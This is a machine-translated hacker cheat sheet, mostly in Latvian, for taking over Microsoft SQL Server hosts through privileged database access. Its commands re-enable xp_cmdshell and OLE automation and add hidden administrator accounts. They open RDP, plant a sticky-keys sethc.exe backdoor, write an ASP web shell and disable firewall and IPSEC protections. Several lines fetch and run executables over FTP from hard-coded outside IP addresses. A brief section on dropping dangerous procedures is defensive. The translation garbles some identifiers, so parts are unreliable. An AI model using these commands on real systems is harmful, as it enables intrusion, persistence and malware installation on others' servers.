1433 remonta pasūtījumi
neto lietotājs SQLDebugger saraksts /add
neto vietējās grupas administratori SQLDebugger /add
Kļūdas ziņojums: Neizdevās atrast saglabāto procedūru 'master.. xp_cmdshell'。
Remonta metode: ļoti vispārīga, patiesībā citus 126 127 var salabot kopā,
Izņemot xplog70.dll visu pārējo var labot ar šo komandu
xp_cmdshell jaunas atkopšanas metodes
1. darbība: dzēst:
Pilienu procedūra sp_addextendedproc
Pilienu procedūra sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
Serveris: ziņojums 3701, 11. līmenis, 5. stāvoklis, 1. rinda
Nav iespējams noņemt procesu "sp_addextendedproc", jo tas nepastāv sistēmas direktorijā.
Serveris: Msg 3701, 11. līmenis, 5. stāvoklis, sp_dropextendedproc. procedūra, 18. rinda
Nav iespējams noņemt procesu "xp_cmdshell", jo tas nepastāv sistēmas direktorijā.
2. solis Atgūšana:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
Tieša atgūšana neatkarīgi no tā, vai sp_addextendedproc pastāv vai nav
xplog70.dll labojumi:
Kļūdas ziņojums: DLL xplog70.dll vai kādu no DLL, uz kuriem atsaucas DLL, nevarēja uzstādīt. Iemesls: 126 (Norādīto moduli nevar atrast.) )。
Labojiet XPLOG70.DLL (vispirms pārbaudiet dublējuma direktoriju \x86\bin ar failu un pēc tam nomainiet šādu direktoriju)
1. darbība
exec sp_dropextendedproc 'xp_cmdshell'
2. darbība
dbcc addextendedproc ("xp_cmdshell","c:\sql2ksp4\x86\binn\xplog70.dll")
Neizdevās atrast saglabāto procedūru 'master.. xp_cmdshell'。
1. darbība:
izveidot procedūru sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (īpašnieks.) Izsaucamās funkcijas nosaukums
*/
@dllname varchar(255)/* DLL nosaukums, kas satur funkciju */
kā
Izslēgt implicit_transactions
ja @@trancount > 0
Sākt
raiserror(15002;-1;-1;'sp_addextendedproc')
atgriešanās (1)
beigas
dbcc addextendedproc( @functname, @dllname)
atgriešanās (0) -- sp_addextendedproc
IET
2. darbība:
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
SQL Server bloķēja piekļuvi komponenta xp_cmdshell procesa sys.xp_cmdshell, jo šis komponents tika izslēgts kā daļa no šī servera drošības konfigurācijas. Sistēmas administratori var iespējot xp_cmdshell, izmantojot sp_configure. Papildinformāciju par xp_cmdshell iespējošanu skatiet sadaļā Perifēro lietojumprogrammu konfigurators SQL Server tiešsaistes grāmatu sērijā.
; EXEC sp_configure "rādīt papildu opcijas", 1 --
; PĀRKONFIGURĒT AR OVERRIDE --
; EXEC sp_configure 'xp_cmdshell', 1 --
; PĀRKONFIGURĒT AR OVERRIDE --
; EXEC sp_configure 'rādīt papildu opcijas', 0 --
Noņemiet SQL bīstamo krātuvi:
NOMEŠANAS PROCEDŪRA sp_makewebtask
izpildmeistars .. sp_dropextendedproc xp_cmdshell
izpildmeistars .. sp_dropextendedproc xp_dirtree
izpildmeistars .. sp_dropextendedproc xp_fileexist
izpildmeistars .. sp_dropextendedproc xp_terminate_process
izpildmeistars .. sp_dropextendedproc sp_oamethod
izpildmeistars .. sp_dropextendedproc sp_oacreate
izpildmeistars .. sp_dropextendedproc xp_regaddmultistring
izpildmeistars .. sp_dropextendedproc xp_regdeletekey
izpildmeistars .. sp_dropextendedproc xp_regdeletevalue
izpildmeistars .. sp_dropextendedproc xp_regenumkeys
izpildmeistars .. sp_dropextendedproc xp_regenumvalues
izpildmeistars .. sp_dropextendedproc sp_add_job
izpildmeistars .. sp_dropextendedproc sp_addtask
izpildmeistars .. sp_dropextendedproc xp_regread
izpildmeistars .. sp_dropextendedproc xp_regwrite
izpildmeistars .. sp_dropextendedproc xp_readwebtask
izpildmeistars .. sp_dropextendedproc xp_makewebtask
izpildmeistars .. sp_dropextendedproc xp_regremovemultistring
izpildmeistars .. sp_dropextendedproc sp_OACreate
DROP PROCEDŪRA sp_addextendedproc
Paplašināto saglabāto procedūru atjaunošana
Vispirms atjaunojiet sp_addextendedproc, paziņojums ir šāds:
Pirmkārt:
izveidot procedūru sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (īpašnieks.) izsaucamās funkcijas nosaukums */ @dllname varchar(255)/* DLL nosaukums, kas satur funkciju */ kā
Izslēgt implicit_transactions
ja @@trancount > 0
Sākt
raiserror(15002;-1;-1;'sp_addextendedproc')
atgriešanās (1)
beigas
dbcc addextendedproc( @functname, @dllname)
atgriešanās (0) -- sp_addextendedproc
IET
Otrkārt:
MASTER izmantošana
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
izpilddirektors sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
izpilddirektors sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
izpilddirektors sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
izpilddirektors sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
Izdzēsiet priekšrakstu, kas paplašina saglabāto procedūru xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'
Atgūt cmdshell sql paziņojumu
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Atveriet cmdshell SQL priekšrakstu
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Krātuves paplašināšanas noteikšana
Atlasiet count(*) no master.dbo.sysobjects, kur xtype='x' un name='xp_cmdshell'
Atgrieztais rezultāts ir 1, un tas ir OK
Atjaunot xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'; Atlasiet count(*) no master.dbo.sysobjects, kur xtype='x' un name='xp_cmdshell'
Atgrieztais rezultāts ir 1, un tas ir OK
Pretējā gadījumā augšupielādējiet xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
Bloķēt cmdshell sql paziņojumu
sp_dropextendedproc "xp_cmdshell
Viens. SA paroles metodes maiņa:
Pēc savienojuma izveides ar SQL visaptverošo izmantošanas rīku izpildiet komandu:
exec sp_password NULL, 'jauna parole', 'sa'
(Padoms: lietojiet piesardzīgi!)
Divi. Vienkārši ielāpējiet vājo paroli.
1. metode: vaicājiet sadalītāju pēc savienošanas:
ja ir (atlasiet * no
dbo.sysobjects, kur id = object_id(N'[dbo].[ xp_cmdshell]") un
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo]. [xp_cmdshell]"
IET
Pēc tam nospiediet taustiņu F5, lai izpildītu komandu
2. metode: vaicājums pēc sadalītāja pievienošanas
Pirmais solis ir izpildīt: izmantot meistaru
2. solis: sp_dropextendedproc "xp_cmdshell"
Pēc tam nospiediet taustiņu F5, lai izpildītu komandu
DLL xpsql70.dll vai kādu no DLL, uz kuriem atsaucas DLL, nevar uzstādīt. 126. iemesls (norādīto moduli nevar atrast. )
Atgūšanas metode: Pēc sadalītāja savienojuma vaicāšanas,
1. solis: sp_dropextendedproc "xp_cmdshell"
2. solis: sp_addextendedproc "xp_cmdshell", "xpsql70.dll"
Funkciju xp_cmdshell nevar atrast bibliotēkas xpweb70.dll. Iemesls: 127 (Norādīto programmu nevar atrast.) )
Atgūšanas metode: Pēc sadalītāja savienojuma vaicāšanas,
1. solis Izpilde: exec sp_dropextendedproc "xp_cmdshell"
2. solis: exec sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll'
Pēc tam nospiediet taustiņu F5, lai izpildītu komandu
Ja neviena no iepriekš minētajām metodēm nav atgūstama, lūdzu, mēģiniet pievienot kontu tieši, izmantojot tālāk norādītās metodes.
Pēc sadalītāja savienojuma vaicāšanas,
2000servser sistēma:
declare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'
declare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'
XP vai 2003Server sistēma: 126 kļūda! Pasūtīt
declare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user Web$ hacker /add'
declare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'
C:\>DIR C:\
SQL Server bloķēja piekļuvi komponenta xp_cmdshell procesa sys.xp_cmdshell, jo šis komponents tika izslēgts kā daļa no šī servera drošības konfigurācijas. Sistēmas administratori var iespējot xp_cmdshell, izmantojot sp_configure. Papildinformāciju par xp_cmdshell iespējošanu skatiet sadaļā Perifēro lietojumprogrammu konfigurators SQL Server tiešsaistes grāmatu sērijā.
Analizatora izpildītie paziņojumi:
EXEC sp_configure "rādīt papildu opcijas", 1; PĀRKONFIGURĒT; EXEC sp_configure 'xp_cmdshell', 1; PĀRKONFIGURĒT;
Dažreiz, izpildot iepriekš minētos paziņojumus ar vaicājuma atdalītāja savienojumu, saglabāto procedūru nevar atrast sp_addextendedproc
Risinājums:
izveidot procedūru sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (īpašnieks.) Izsaucamās funkcijas nosaukums */
@dllname varchar(255)/* DLL nosaukums, kas satur funkciju */
kā
Izslēgt implicit_transactions
ja @@trancount > 0
Sākt
raiserror(15002;-1;-1;'sp_addextendedproc')
atgriešanās (1)
beigas
dbcc addextendedproc( @functname, @dllname)
atgriešanās (0) -- sp_addextendedproc
IET
Šis kods tiek ielīmēts vaicājuma sadalītājā un izpildīts
Pētnieks:
c:\windows\explorer.exe
Skatīt satura rādītāju
exec master.dbo.xp_subdirs 'c:\'
Disku saraksts
izpildmeistars .. xp_fixeddrives
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号!
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Atlasiet * no OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Atlasiet * no OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
echo Windows reģistra redaktora versija 5.00 >3389.reg
atbalss. >>3389.reg
atbalss [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
atbalss [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
atbalss [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
atbalss [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
atbalss [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
atbalss [HKEY_USERS\. DEFAULT\Keyboard Layout\Togle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
atbalss [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
regedit /s 3389.reg
Atvērt 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; --
Caurlaide 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;
Pārbaudiet portu 3389
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Parastās CMD aizmugurējās durvis
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
win2K nonāk tieši uz PS Mar
izpildmeistars .. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
atlasiet * no openrowset('microsoft.jet.oledb.4.0','; database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c @echo atvērt 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo iegūt 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
win03-XP tieši uz PS zirgiem
izpildmeistars .. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
atlasiet * no openrowset('microsoft.jet.oledb.4.0','; database=C:\Windows\System32\IAS\ias.mdb','Select Shell("cmd.exe /c @echo atvērt 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo iegūt 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
5. Pārslēdziet aizmugures komandu
deklarēt @o int
exec sp_oacreate 'scrip noņemt ting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
deklarēt @o int
exec sp_oacreate 'scrip noņemt ting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
kopēt c:\windows\explorer.exe c:\windows\system32\sethc.exe
kopēt c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
deklarēt @o int
exec sp_oacreate 'wscrip noņemt t.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX ir komanda, kuru vēlaties izpildīt
Uzrakstiet reģistrā norādītajā atslēgā norādīto vērtību, izmantojot metodi (rakstiet bbb atslēgā HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue):
EXEC meistars .. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='PROGRAMMATŪRA\aaa',
@value_name='aaaVērtība',
@type='REG_SZ',
@value='bbb'
@echo atvērtu 121.22.56.5>c:\bin.txt&@echo list>>c:\bin.txt&@echo list>>c:\bin.txt&@echo iegūt gzn.exe>>c:\bin.txt&@echo bye>>c:\bin.txt&@ftp -s:c:\bin.txt&del c:\bin.txt&gzn.exe& gzn.exe&gzn.exe
Vispirms kopējiet ftp.exe uz wmpub direktoriju
@echo CD C:\wmpub\>c:\wmpub\in.bat&@echo ftp -s:c:\wmpub\xiuxiu.txt>>c:\wmpub\in.bat
Atvērt 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators IUSR_SERVER /add
SQL raksta teikumu
exec master.dbo.xp_subdirs 'd:\web\cdlxkj';
exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '
SA smilšu kastes režīma veicināšanas -----
----------------------
izpildmeistars .. xp_regwrite 'HKEY_LOCAL_MACHINE','PROGRAMMATŪRA\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
-------------------------------------------------------
Atlasiet * no OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")');
-------------------------------------------------------
Atlasiet * no OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');
3389 MAIŅA
Izmantotais teikums:
Iebrukums
EXEC meistars .. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='PROGRAMMATŪRA\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE",
@value_name='Atkļūdotājs',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
Atgūšana
EXEC meistars .. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='PROGRAMMATŪRA\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE",
@value_name='Atkļūdotājs',
@type='REG_SZ',
@value=''
Attēlu nolaupīšana
EXEC meistars .. xp_regwrite --- tas ir reģistra rediģēšana!
@rootkey='HKEY_LOCAL_MACHINE', ---Šī ir pozīcija!
@key='PROGRAMMATŪRA\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE", -----Šī ir arī pozīcija!
@value_name='Atkļūdotājs', --- tas ir tabulas nosaukums!
@type='REG_SZ', --- šeit ir rakstīšanas nozīme!
@value='C:\WINDOWS\explorer.exe' ---- šeit ir rakstītais saturs!
Viss process ir izmantot meistaru: xp_regwrite šis komponents ir izdarīts,
1.sql komanda, lai vaicātu, vai reģistra pielīmētā atslēga ir nolaupīta
izpildmeistars .. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql komanda nolaupa reģistra lipīgo taustiņu funkciju un aizstāj to ar uzdevumu pārvaldnieku (protams, jūs varat to aizstāt ar citām vēlamajām komandām)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'PROGRAMMATŪRA\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Atkļūdotājs','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql komanda, lai noņemtu reģistra pielīmējamās atslēgas nolaupīšanas funkciju, aizsargā jūsu serveri no citu izmantošanas
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
SQL rakstīšanas faili
deklarēt @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip noņemt ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("Wscrip remove t.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. Datora nosaukums"
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob. Izveidot ("lietotājs","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
Skripti bez NET eskalācijas
struser=wscrip, lai noņemtu t.argumentus(0)
strpass=wscrip, lai noņemtu t.argumentus(1)
set lp=createObject("Wscrip noņemt t.NETWORK")
oz="WinNT://"&lp. Datora nosaukums
Iestatīt ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("lietotājs",struser)
od. SetPassword strpass
od. Iestatīt informāciju
Set of=GetObject(oz&"/" & struser & ",user")
oe. Pievienot (no. ADsPath)
Katram administratoram oe. Locekļi
ja struser=admin. Nosaukums tad
Wscrip noņemts t.echo struser & "Izveidots veiksmīgi!"
wscrip, lai noņemtu t.quit
beigt, ja
Nākamais
Wscrip noņemt t.echo struser & "Lietotāja izveide neizdevās!"
Saglabājiet iepriekš minēto kā lietotāju. VBS fails
Pēc tam izpildiet: cscrip, lai noņemtu user.vbs lietotājvārda paroli
Izmantojot JET smilškastes režīmu, varat atrisināt problēmas, ko izraisa saglabātās procedūras, piemēram, XP_cmdshell un saistītās dinamisko saišu bibliotēkas. Drošības apsvērumu dēļ sistēma pēc noklusējuma neieslēdz smilšu kastes režīmu, kas prasa xp_regwrite, lai ieslēgtu smilšu kastes režīmu:
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0
\Engines','SandBoxMode','REG_DWORD',1
Pēc tam izpildiet smilšu kastes komandu, lai sistēmai pievienotu lietotāja nosaukumu test ar paroli 1234:
atlasiet * no openrowset('microsoft.jet.oledb.4.0','; datu bāze=C:\Windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')
atlasiet * no openrowset('microsoft.jet.oledb.4.0','; datu bāze=C:\Windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup
administratori pārbauda /pievieno")')
Dažādām operētājsistēmām ir dažādi ceļi, un tās ir jāmaina atkarībā no situācijas:
NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\
Turklāt programmā Microsoft SQL Server 2005 dažas saglabātās procedūras tiek aizvērtas pēc noklusējuma, un tām ir nepieciešamas komandas, lai atvērtu:
Ieslēdziet XP_cmdshell.
EXEC sp_configure "rādīt papildu opcijas", 1; PĀRKONFIGURĒT; EXEC sp_configure
"xp_cmdshell", 1; PĀRKONFIGURĒT;
Atveriet 'OPENROWSET':
exec sp_configure 'rādīt papildu opcijas', 1; PĀRKONFIGURĒT; exec sp_configure
"Ad hoc izkliedētie vaicājumi",1; PĀRKONFIGURĒT;
Ieslēdziet opciju "sp_oacreate".
exec sp_configure 'rādīt papildu opcijas', 1; PĀRKONFIGURĒT; exec sp_configure
"Ole automatizācijas procedūras",1; PĀRKONFIGURĒT;
Šeit ir dažas situācijas, kad izpildes komanda zem sa ir nepareiza:
1. DLL xpsql70.dll vai DLL, uz kuru atsaucas DLL, nevar ielādēt. 126. iemesls (norādīto moduli nevar atrast. )
Šī situācija ir salīdzinoši izplatīta, un remonts ir vienkāršs un vienkāršs, taču ir nosacījumi. Ja šajā gadījumā varat uzskaitīt direktoriju (ar sqltools v2.0 ir direktorija funkcija) Apsveicam ar šo 80% situāciju, ja varat uzskaitīt direktoriju, tad vienkārši atrodiet xplog70.dll ceļu un izpildiet šādu komandu.
1. darbība
exec sp_dropextendedproc 'xp_cmdshell' (šī komanda ir izdzēst sākotnējo cmdshell, jo tas jau ir nogājis greizi)
2. darbība
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
; EXEC sp_configure "rādīt papildu opcijas", 0 –
Protams, tā ir sql komanda, kas tiek izpildīta ar vaicājumu analizatoru. c: \ Program Files \ Microsoft SQL Server \ MSSQL \ Binn \ xplog70.dll otrajā solī ir xplog70.dll ceļš, šis ceļš ir salīdzinoši izplatīts, ja c diskam tā nav, varat atrast citus diska burtus.
2. Nevar atrast funkciju xp_cmdshell bibliotēkas xpweb70.dll. Iemesls: 127 (Norādīto programmu nevar atrast.) )
Faktiski tas ir tāds pats kā iepriekš minētais 126, tas ir, cmdshell ir nepareizs, ja vien atrodat dublējumu xplog70.dll ievērojat iepriekš minēto metodi, lai to labotu.
3. Neizdevās atrast saglabāto procedūru "master". xpcmdshell"
Šajā gadījumā es redzu internetā, ka metode ir:
1. darbība: dzēst:
Pilienu procedūra sp_addextendedproc
Pilienu procedūra sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
2. solis Atgūšana:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
Patiesībā tas joprojām ir tāds pats kā iepriekš, patiesībā, ja esat uzmanīgs, iepriekš minētais 126 127 tikai neizdosies atrast saglabāto procedūru "master:. xpcmdshell", jo pirmais solis ir izdzēst cmdshell saglabāto procedūru. Tātad šajā gadījumā vienkārši izpildiet otro soli iepriekš.
4. Kļūdas ziņojums: SQL Server bloķēja piekļuvi komponenta xp_cmdshell procesa sys.xp_cmdshell, jo šis komponents tika izslēgts kā daļa no šī servera drošības konfigurācijas. Sistēmas administratori var iespējot xp_cmdshell, izmantojot sp_configure. Papildinformāciju par xp_cmdshell iespējošanu skatiet sadaļā Perifēro lietojumprogrammu konfigurators SQL Server tiešsaistes grāmatu sērijā.
Šī situācija ir visvienkāršākā, jo jums nav jādomā par neko, vienkārši izpildiet šādu komandu
; EXEC sp_configure "rādīt papildu opcijas", 1 --
; PĀRKONFIGURĒT AR OVERRIDE --
; EXEC sp_configure 'xp_cmdshell', 1 --
; PĀRKONFIGURĒT AR OVERRIDE --
; EXEC sp_configure "rādīt papildu opcijas", 0 –
Pēc iepriekš minētā labojuma varat izpildīt komandu cmd, un jūs sāksiet paaugstināt savu jaudu. Es parasti vispirms pārbaudu ip, lai redzētu, vai tas ir iekštīkls, un pēc tam REG vaicājumu HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber, lai pārbaudītu termināļa portu, un pēc tam netstat -an, lai redzētu, vai terminālis ir atvērts, un pēc tam neto lietotāja lietotāja parole / pievienojiet lietotāju un pēc tam neto vietējās grupas administratoru lietotāju /add Ja viss norit labi, tas noņems serveri. Bet šajā procesā ir daudz problēmu.
1. Neto jaudas veicināšana ir veiksmīga, bet nevar izveidot savienojumu ar termināli Ir šādas situācijas
(1) Serveris atrodas iekštīklā.
(2) TCP/IP pārbaude.
Vispirms palaidiet šādu cmd komandu:
cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, eksportējiet reģistra pirmo daļu TCP/IP filtrēšanai
cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, eksportējiet reģistra otro daļu TCP/IP filtrēšanai
cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip", eksportējot trešo vietu reģistrā par TCP/IP filtrēšanu
Pēc tam dodieties atpakaļ uz c disku 1.reg, 2.reg, 3.reg, lejupielādējiet 1.reg, 2.reg 3.reg atpakaļ cietajā diskā, lai rediģētu, atrodiet lauku EnableSecurityFilters, lai redzētu, vai atslēgas vērtība pēc dword ir 000000000, ja tā ir 00000001, tas nozīmē, ka administrators ir veicis tcp / ip filtrēšanu, mums vienkārši jāmaina 1 uz 0, 2. reg un 3.reg veikt tādas pašas izmaiņas.
(3) Izveidojiet intelektuālā īpašuma drošības politiku.
Palaidiet komandu cmd: cmd /c net stop policyagent, lai apturētu IPSEC pakalpojumu pakalpojumu. Vēlreiz pievienojiet termināli.
(4) Administratora iestatīto termināļa pieteikšanās atļauju var izmantot tikai norādītais lietotājs.
(5) Ugunsmūris. Palaidiet komandu cmd: net stop alg /ynet stop sharedaccess
2. Parādās NET eskalācija un piekļuve tiek atteikta
Varat izmēģināt net1 lietotāja lietotāja paroli /add Ja net1 arī liedz piekļuvi, varat kopēt shfit aizmugurējās durvis un mēģināt izpildīt cmd komandu: kopēt c:\windows\explorer.exe c:\windows\system32\sethc.exe
kopēt c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
Ja tiek prasīts, nokopējiet 1 failu, kas izrādās veiksmīgs. Izveidojiet savienojumu ar termināli un nospiediet 5 maiņas, lai redzētu, kas parādās. Spēlējiet ar Kaka Explorer, tagad vienkārši pievienojiet lietotāju ar roku.
3. Neto eskalācija notiek ar piekļuves atteikuma kļūdu 5 (izcelt)
Šajā gadījumā jums nav jāmēģina net1, varat izmēģināt kopēšanas maiņas aizmugurējās durvis, ja kopija liek kopēt 0 failu, tas pierāda, ka tas nav veiksmīgs. Tad jūs varat mēģināt to augšupielādēt, ja varat to augšupielādēt, varat tieši nosūtīt ne-tīkla jaudas eskalācijas rīku, kas iznāca pirms kāda laika, un pēc tam pievienot lietotāju. Bet lielāko daļu šo gadījumu nevar augšupielādēt, tāpēc jums par to ir jādomā. Tā kā cmd var izpildīt, tad failu var lejupielādēt, izmantojot cmd zem ftp, bet ftp priekšnoteikums ir spēt rakstīt tekstu vai partijas apstrādi. Tad jūs varat rakstīt tekstu vai partiju, izmantojot SQL paziņojumu.
deklarēt @o int, @f int, @t int, @ret int
